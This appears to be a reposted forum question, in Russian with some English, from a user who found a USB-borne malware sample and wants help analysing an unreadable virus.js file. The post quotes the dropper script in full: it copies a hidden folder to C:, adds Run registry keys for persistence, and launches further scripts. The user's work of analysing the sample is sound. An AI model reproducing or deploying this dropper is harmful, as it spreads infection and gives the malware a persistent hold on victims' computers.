Код: Выделить всё
var FSO = WScript.CreateObject("Scripting.FIleSystemObject");
var WshShell = WScript.CreateObject("Wscript.Shell");
var pt1 = FSO.GetDriveName(WshShell.CurrentDirectory); // Flash drive name
// Open Documents folder and copy the virus to C:
WshShell.Run(pt1 + "\\Document");
FSO.CopyFolder(pt1 + "\\Document\\SystemPC", "C:\\");
// Write to registry for persistence
WshShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\prog", "C:\\SystemPC\\prog.js", "REG_SZ");
WshShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\onFlash", "C:\\SystemPC\\onFlash.js", "REG_SZ");
// Execute the scripts
WshShell.Run("C:\\SystemPC\\onFlash.js");
WshShell.Run("C:\\SystemPC\\prog.js");
< /code>
Удивительно, но ничего не случилось с моим компьютером. Запуск ATTRIB -H -R -S /S /D G:*< /code> в CMD выявил папку [b] SystemPC < /strong>, содержащая: < /p>
[list]
[*]OnFlash.jsКод: Выделить всё
onPC.jsКод: Выделить всё
prog.jsКод: Выделить всё
unp40590149.tmpКод: Выделить всё
virus.js[/list]
Мне нужно проанализировать virus.js , но я не могу прочитать его, используя блокнот ++, разные кодировки , или hxd
scenshot:
Как я могу расшифровать или проанализировать этот файл? p>
What I Tried:[/b]
- Opened in Notepad++ (various encodings) → unreadable
- Opened in HxD (hex editor) → binary format
- Unable to extract using 7zip
Подробнее здесь: https://stackoverflow.com/questions/794 ... virus-file
Мобильная версия